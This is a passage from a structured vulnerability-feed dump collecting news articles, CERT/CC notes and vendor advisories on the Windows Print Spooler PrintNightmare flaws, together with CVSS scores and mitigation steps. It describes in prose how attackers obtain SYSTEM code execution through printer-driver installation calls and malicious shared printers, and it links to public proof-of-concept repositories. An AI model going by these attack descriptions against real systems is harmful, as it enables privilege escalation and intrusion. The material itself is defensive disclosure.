long period of inactivity, but had not yet been disabled in the NGO's Active Directory, thereby allowing the attackers to escalate their privileges using the PrintNightmare flaw and disable the MFA service altogether.\n\n\"As Duo's default configuration settings allow for the re-enrollment of a new device for dormant accounts, the actors were able to enroll a new device for this account, complete the authentication requirements, and obtain access to the victim network,\" the agencies explained.\n\nTurning off MFA, in turn, allowed the state-sponsored actors to authenticate to the NGO's virtual private network (VPN) as non-administrator users, connect to Windows domain controllers via Remote Desktop Protocol (RDP), and obtain credentials for other domain accounts.\n\nIn the final stage of the attack, the newly compromised accounts were subsequently utilized to move laterally across the network to siphon data from the organization's cloud storage and email accounts.\n\nTo mitigate such attacks, both CISA and FBI are recommending organizations to enforce and review multi-factor authentication configuration policies, disable inactive accounts in Active Directory, and prioritize patching for [known exploited flaws](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-16T13:29:00", "type": "thn", "title": "FBI, CISA Warn of Russian Hackers Exploiting MFA and PrintNightmare Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-16T13:29:45", "id": "THN:A52CF43B8B04C0A2F8413E17698F9308", "href": "https://thehackernews.com/2022/03/fbi-cisa-warn-of-russian-hackers.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:54", "description": "[![Windows RCE Vulnerability](https://thehackernews.com/images/-hJTm9-cqglY/YNxU5_qFPTI/AAAAAAAADCE/M7b8MDQXSLEIfe1qnm26-N908L-atUbsQCLcBGAsYHQ/s728-e1000/windows-hacking.jpg)](<https://thehackernews.com/images/-hJTm9-cqglY/YNxU5_qFPTI/AAAAAAAADCE/M7b8MDQXSLEIfe1qnm26-N908L-atUbsQCLcBGAsYHQ/s0/windows-hacking.jpg>)\n\nA proof-of-concept (PoC) exploit related to a remote code execution vulnerability affecting Windows Print Spooler and patched by Microsoft earlier this month was briefly published online before being taken down.\n\nIdentified as [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), the security issue could grant remote attackers full control of vulnerable systems. [Print Spooler](<https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler>) manages the printing process in Windows, including loading the appropriate printer drivers and scheduling the print job for printing, among others.\n\nPrint Spooler flaws are concerning, not least because of the wide attack surface, but also owing to the fact that it runs at the highest privilege level and is capable of dynamically loading third-party binaries.\n\nThe Windows maker addressed the vulnerability as part of its [Patch Tuesday](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>) update on June 8, 2021. But almost two weeks later, Microsoft revised the flaw's impact from an elevation of privilege to remote code execution (RCE) as well as upgraded the severity level from Important to Critical.\n\n\"Either the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or remotely (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., tricking a legitimate user into opening a malicious document),\" Microsoft said in its advisory.\n\nThings took a turn when Chinese security firm QiAnXin earlier this week [disclosed](<https://twitter.com/RedDrip7/status/1409353110187757575>) it was able to find the \"right approaches\" to leverage the flaw, thereby demonstrating a successful exploitation to achieve RCE.\n\nAlthough the researchers refrained from sharing additional technical specifics, Hong Kong-based cybersecurity company Sangfor published what's an independent deep-dive of the same vulnerability to GitHub, along with a fully working PoC code, where it remained publicly accessible before it was taken offline a few hours later.\n\nSangfor codenamed the vulnerability \"PrintNightmare.\"\n\n\"We deleted the PoC of PrintNightmare. To mitigate this vulnerability, please update Windows to the latest version, or disable the Spooler service,\" [tweeted](<https://twitter.com/edwardzpeng/status/1409810304091889669>) Sangfor's Principal Security Researcher Zhiniang Peng. The findings are expected to be [presented](<https://www.blackhat.com/us-21/briefings/schedule/#diving-in-to-spooler-discovering-lpe-and-rce-vulnerabilities-in-windows-printer-23315>) at the Black Hat USA conference next month.\n\nWindows Print Spooler has long been a source of security vulnerabilities, with Microsoft fixing at least three issues \u2014 [CVE-2020-1048](<https://www.blackhat.com/us-20/briefings/schedule/index.html#a-decade-after-stuxnets-printer-vulnerability-printing-is-still-the-stairway-to-heaven-19685>), [CVE-2020-1300](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1300>), and [CVE-2020-1337](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1337>) \u2014 in the past year alone. Notably, a flaw in the service was also abused to gain remote access and propagate the [Stuxnet](<https://en.wikipedia.org/wiki/Stuxnet>) worm in 2010 targeting Iranian nuclear installations.\n\n_**Update **_**_\u2014_** There are now indications that the fix released by Microsoft for the critical remote code execution vulnerability in the Windows Print spooler service in June does not completely remediate the root cause of the bug, according to the CERT Coordination Center, raising the possibility that it's a zero-day flaw in need of a patch.\n\n\"While Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does not address the public exploits that also identify as CVE-2021-1675,\" CERT/CC's Will Dormann [said](<https://twitter.com/wdormann/status/1410198834970599425>) in a [vulnerability note](<https://kb.cert.org/vuls/id/383432>) published Wednesday.\n\nIt's worth noting that the successful exploitation of CVE-2021-1675 could open the door to complete system takeover by remote adversaries. We have reached out to Microsoft for comment, and we will update the story when we hear back.\n\nIn light of the latest disclosure, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) is [recommending](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) that administrators \"disable the Windows Print spooler service in Domain Controllers and systems that do not print.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-30T11:28:00", "type": "thn", "title": "Researchers Leak PoC Exploit for a Critical Windows RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1300", "CVE-2020-1337", "CVE-2021-1675"], "modified": "2021-07-02T04:15:41", "id": "THN:EDD5C9F076596EB9D13D36268BDBFAD1", "href": "https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2023-05-27T15:38:20", "description": "### Overview\n\nMicrosoft Windows allows for non-admin users to be able to install printer drivers via Point and Print. Printers installed via this technique also install queue-specific files, which can be arbitrary libraries to be loaded by the privileged Windows Print Spooler process.\n\n### Description\n\nMicrosoft Windows allows for users who lack administrative privileges to still be able to install printer drivers, which execute with `SYSTEM` privileges via the Print Spooler service. This ability is achieved through a capability called [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>). Starting with the update for [MS16-087](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-087>), Microsoft requires that printers installable via Point are either signed by a [WHQL release signature](<https://docs.microsoft.com/en-us/windows-hardware/drivers/install/whql-release-signature>), or are signed by a certificate that is explicitly trusted by the target system, such as an installed test signing certificate. The intention for this change is to avoid installation of malicious printer drivers, which can allow for Local Privilege Escalation (LPE) to `SYSTEM`.\n\nWhile Windows enforces that driver packages themselves are signed by a trusted source, Windows printer drivers can specify [queue-specific files](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/installing-queue-specific-files>) that are associated with the use of the device. For example, a shared printer can specify a `CopyFiles` directive for arbitrary files. These files, which may be copied over alongside the digital-signature-enforced printer driver files are **not** covered by any signature requirement. Furthermore, these files can be used to overwrite any of the signature-verified files that were placed on a system during printer driver install. The remote printer can also be configured to automatically execute code in any files dropped by the `CopyFiles` directive. This can allow for LPE to `SYSTEM` on a vulnerable system.\n\nAn exploit for this vulnerability is [publicly available](<https://twitter.com/gentilkiwi/status/1416429860566847490>).\n\n### Impact\n\nBy connecting to a malicious printer, an attacker may be able to execute arbitrary code with `SYSTEM` privileges on a vulnerable system.\n\n### Solution\n\nMicrosoft has published updates for [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) regarding this issue. Please also consider the following workarounds:\n\n#### Block outbound SMB traffic at your network boundary\n\nPublic exploits for this vulnerability utilize SMB for connectivity to a malicious shared printer. If outbound connections to SMB resources are blocked, then this vulnerability may be mitigated for malicious SMB printers that are hosted outside of your network. Note that an attacker local to your network would be able to share a printer via SMB, which would be unaffected by any outbound SMB traffic rules.\n\n#### Configure both PackagePointAndPrintServerList and PackagePointAndPrintOnly settings\n\nMicrosoft Windows has a Group Policy called \"Package Point and Print - Approved servers\", which is reflected in the `HKLM\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PackagePointAndPrint\\PackagePointAndPrintServerList` and `HKLM\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PackagePointAndPrint\\ListofServers` registry values. This policy can restrict which servers can be used by non-administrative users to install printers via Point and Print. Configure this policy to prevent installation of printers from arbitrary servers.\n\nTo ensure that Microsoft Windows only attempts to install Package Point and Print printers, and therefore restricting printer connections to the approved servers list, you must also set the `HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PackagePointAndPrint\\PackagePointAndPrintOnly` registry value to `1`. The Group Policy setting that corresponds to this value is called \"Use only Package Point and print\". Setting this value to \"Enabled\" will enforce that only Package Point and Print printers will be used.\n\n**Both** of these settings must be configured to protect against exploitation of this vulnerability.\n\n#### Block the ability to modify the print spooler drivers directory\n\nCourtesy of the [TRUESEC Blog](<https://blog.truesec.com/2021/06/30/fix-for-printnightmare-cve-2021-1675-exploit-to-keep-your-print-servers-running-while-a-patch-is-not-available/>), this vulnerability can be mitigated by preventing the `SYSTEM` account from being able to modify the `C:\\Windows\\System32\\spool\\drivers` directory contents.\n\nTo enable this mitigation, from a privileged PowerShell session, run:\n \n \n $Path = \"C:\\Windows\\System32\\spool\\drivers\"\n $Acl = (Get-Item $Path).GetAccessControl('Access')\n $Ar = New-Object System.Security.AccessControl.FileSystemAccessRule(\"System\", \"Modify\", \"ContainerInherit, ObjectInherit\", \"None\", \"Deny\")\n $Acl.AddAccessRule($Ar)\n Set-Acl $Path $Acl\n \n\nTo revert the mitigation to allow printer driver installation or modification, run:\n \n \n $Path = \"C:\\Windows\\System32\\spool\\drivers\"\n $Acl = (Get-Item $Path).GetAccessControl('Access')\n $Ar = New-Object System.Security.AccessControl.FileSystemAccessRule(\"System\", \"Modify\", \"ContainerInherit, ObjectInherit\", \"None\", \"Deny\")\n $Acl.RemoveAccessRule($Ar)\n Set-Acl $Path $Acl\n \n\n#### Stop and disable the Print Spooler\n\nThe Print Spooler can be disabled in a privileged PowerShell session by running the following commands:\n \n \n Stop-Service -Name Spooler -Force\n Set-Service -Name Spooler -StartupType Disabled\n \n\n**Impact of workaround** Disabling the Print Spooler service disables the ability to print both locally and remotely.\n\n### Acknowledgements\n\nThis vulnerability was publicly disclosed by Benjamin Delpy. Microsoft credits Victor Mata with reporting this issue to them.\n\nThis document was written by Will Dormann.\n\n### Vendor Information\n\n131152\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Microsoft Affected\n\nNotified: 2021-07-18 Updated: 2021-07-18 **CVE-2021-36958**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n \n\n\n### References\n\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>\n * <https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-087>\n * <https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>\n * <https://docs.microsoft.com/en-us/windows-hardware/drivers/install/whql-release-signature>\n * <https://docs.microsoft.com/en-us/windows-hardware/drivers/print/installing-queue-specific-files>\n * <https://twitter.com/gentilkiwi/status/1416429860566847490>\n * <https://blog.truesec.com/2021/06/30/fix-for-printnightmare-cve-2021-1675-exploit-to-keep-your-print-servers-running-while-a-patch-is-not-available/>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-36958 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-36958>) \n---|--- \n**Date Public:** | 2021-07-18 \n**Date First Published:** | 2021-07-18 \n**Date Last Updated: ** | 2021-09-14 22:44 UTC \n**Document Revision: ** | 17 \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-18T00:00:00", "type": "cert", "title": "Microsoft Windows Print Spooler Point and Print allows installation of arbitrary queue-specific files", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-36958"], "modified": "2021-09-14T22:44:00", "id": "VU:131152", "href": "https://www.kb.cert.org/vuls/id/131152", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:38:20", "description": "### Overview\n\nThe Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system.\n\n### Description\n\nThe [RpcAddPrinterDriverEx()](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b>) function is used to install a printer driver on a system. One of the parameters to this function is the [DRIVER_CONTAINER](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/353ff796-6fb3-41cf-8b35-0022dd53d886>) object, which contains information about which driver is to be used by the added printer. The other argument, `dwFileCopyFlags`, specifies how replacement printer driver files are to be copied. An attacker can take advantage of the fact that any authenticated user can call `RpcAddPrinterDriverEx()` and specify a driver file that lives on a remote server. This results in the Print Spooler service `spoolsv.exe` executing code in an arbitrary DLL file with SYSTEM privileges.\n\nNote that while original exploit code relied on the `RpcAddPrinterDriverEx` to achieve code execution, [an updated version of the exploit](<https://github.com/cube0x0/CVE-2021-1675>) uses [RpcAsyncAddPrinterDriver](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/5d864e3e-5d8b-4337-89ce-cb0258ab97cd>) to achieve the same goal. Both of these functions achieve their functionality using [AddPrinterDriverEx](<https://docs.microsoft.com/en-us/windows/win32/printdocs/addprinterdriverex>).\n\nWhile Microsoft has released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), it is important to realize that this update does **NOT** protect against public exploits that may refer to `PrintNightmare` or CVE-2021-1675.\n\nOn July 1, Microsoft released [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). This bulletin states that CVE-2021-34527 is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(). The attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update. \n\n### Impact\n\nBy sending a request to add a printer, e.g. by using `RpcAddPrinterDriverEx()` over SMB or `RpcAsyncAddPrinterDriver()` over RPC, a remote, authenticated attacker may be able to execute arbitrary code with SYSTEM privileges on a vulnerable system. A local unprivileged user may be able to execute arbitrary code with SYSTEM privileges as well. We have created a flowchart to indicate exploitability of PrintNightmare across various platform configurations:\n\n![PrintNightmare exploitability flowchart](/static-bigvince-prod-kb-eb/383432_PrintNightmare%20Flowchart-v9.png)\n\n### Solution\n\n#### Apply an update\n\nMicrosoft has addressed this issue in the [updates for CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). Note that the Microsoft update for CVE-2021-34527 does not effectively prevent exploitation of systems where the [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>) `NoWarningNoElevationOnInstall` is set to a non-`0` value. Microsoft indicates that systems that have `NoWarningNoElevationOnInstall` is set to a non-`0` value are **vulnerable by design.** For systems that do not have the CVE-2021-34527 installed, or have Point and Print configured insecurely, please consider the following workarounds:\n\n#### Apply a workaround\n\nMicrosoft has listed several workarounds in their [advisory for CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). Specifically:\n\n#### Microsoft Option 1 - Stop and disable the Print Spooler service\n\nThis vulnerability can be mitigated by stopping and disabling the Print Spooler service in Windows.\n\nIf disabling the Print Spooler service is appropriate for your enterprise, use the following PowerShell commands:\n\n`Stop-Service -Name Spooler -Force`\n\n`Set-Service -Name Spooler -StartupType Disabled`\n\n**Impact of workaround** Disabling the Print Spooler service disables the ability to print both locally and remotely.\n\n#### Microsoft Option 2 - Disable inbound remote printing through Group Policy\n\nDisable the \u201cAllow Print Spooler to accept client connections:\u201d policy to block remote attacks.\n\n**Impact of workaround** This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\n**Note:** The Print Spooler service **must** be restarted for this workaround to be activated.\n\n#### Block RPC and SMB ports at the firewall\n\nLimited testing has shown that blocking both the RPC Endpoint Mapper (`135/tcp`) and SMB (`139/tcp` and `445/tcp`) incoming traffic at a host-based firewall level can prevent remote exploitation of this vulnerability. Note that blocking these ports on a Windows system may prevent expected capabilities from functioning properly, especially on a system that functions as a server.\n\n#### Enable security prompts for Point and Print\n\nEnsure that the Windows Point and Print Restrictions are set to `Show warning and elevation prompt` for both installing and updating drivers in the Windows Group Policy. Specifically the `HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\` key should have `NoWarningNoElevationOnInstall` and `UpdatePromptSettings` entries that are both set to `0`.\n\n#### Restrict printer driver installation ability to administrators\n\nAfter the Microsoft update for CVE-2021-34527 is installed, a registry value called `RestrictDriverInstallationToAdministrators` in the `HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\` key is checked, which is intended to restrict printer driver installation to only administrator users. Please see [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) for more details.\n\n### Acknowledgements\n\nThis issue was publicly disclosed by Zhiniang Peng and Xuefeng Li.\n\nThis document was written by Will Dormann.\n\n### Vendor Information\n\n383432\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Microsoft __ Affected\n\nNotified: 2021-06-30 Updated: 2021-07-08 **CVE-2021-1675**| Affected \n---|--- \n**CVE-2021-34527**| Affected \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>\n\n \n\n\n### References\n\n * <https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>\n * <https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b>\n * <https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/353ff796-6fb3-41cf-8b35-0022dd53d886>\n * <https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>\n * <https://docs.microsoft.com/en-us/windows/win32/printdocs/addprinterdriverex>\n * <https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>\n * <https://github.com/afwu/PrintNightmare>\n * <https://github.com/cube0x0/CVE-2021-1675>\n * <https://github.com/calebstewart/CVE-2021-1675>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-1675 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-1675>) [CVE-2021-34527 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-34527>) \n---|--- \n**Date Public:** | 2021-06-30 \n**Date First Published:** | 2021-06-30 \n**Date Last Updated: ** | 2021-08-03 15:36 UTC \n**Document Revision: ** | 32 \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-30T00:00:00", "type": "cert", "title": "Microsoft Windows Print Spooler allows for RCE via AddPrinterDriverEx()", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-08-03T15:36:00", "id": "VU:383432", "href": "https://www.kb.cert.org/vuls/id/383432", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the ](<https://www.hivepro.com/wp-content/uploads/2021/06/TA202120.pdf>)[pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202122.pdf>)\n\nAttackers have been targeting Windows Print Spooler services for almost 2 months now. It started with the vulnerability(CVE-2021-1675) being exploited in the wild. Soon a patch was released for the same. It was after 2 days that Microsoft found out that there exist another vulnerability which gives the attacker an access to execute a code in the victim\u2019s system. This new vulnerability(CVE-2021-34527) has been named as PrintNightmare. An emergency patch has been released by Microsoft for some of the versions and a workflow as been made available for other versions.\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/07/image-1024x474.png)\n\n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>\n\n#### References\n\n<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>\n\n<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=notificationEmail#rapid7-analysis>\n\n<https://www.kaspersky.com/blog/printnightmare-vulnerability/40520/>", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T13:50:55", "type": "hivepro", "title": "Emergency patches have been released by Microsoft for PrintNightmare", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-08T13:50:55", "id": "HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5", "href": "https://www.hivepro.com/emergency-patches-have-been-released-by-microsoft-for-printnightmare/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202126.pdf>)[.](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202122.pdf>)\n\nAfter almost 10 days of releasing [an advisory ](<https://www.hivepro.com/emergency-patches-have-been-released-by-microsoft-for-printnightmare/>)by the Hive Pro Threat Research team, a new vulnerability has been found in Windows Print Spooler. This is a privilege escalation flaw that allows attackers to run arbitrary code with SYSTEM privileges, giving them the ability to install programs, read, alter, or remove data, and create new accounts with full user rights. The affected versions have not been known as of now. There have been no patches released yet, but workarounds are available.\n\n#### Vulnerability Details\n\n**CVE ID** | **Affected CPEs** | **Vulnerability Name** \n---|---|--- \nCVE-2021-34481 | cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:* | Microsoft windows print spooler service Privilege Escalation \n \n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481>\n\n#### References\n\n<https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/>\n\n<https://arstechnica.com/gadgets/2021/07/disable-the-windows-print-spooler-to-prevent-hacks-microsoft-tells-customers/>", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-18T13:12:53", "type": "hivepro", "title": "Weren\u2019t you warned about reactivating the Print Spooler?", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481"], "modified": "2021-07-18T13:12:53", "id": 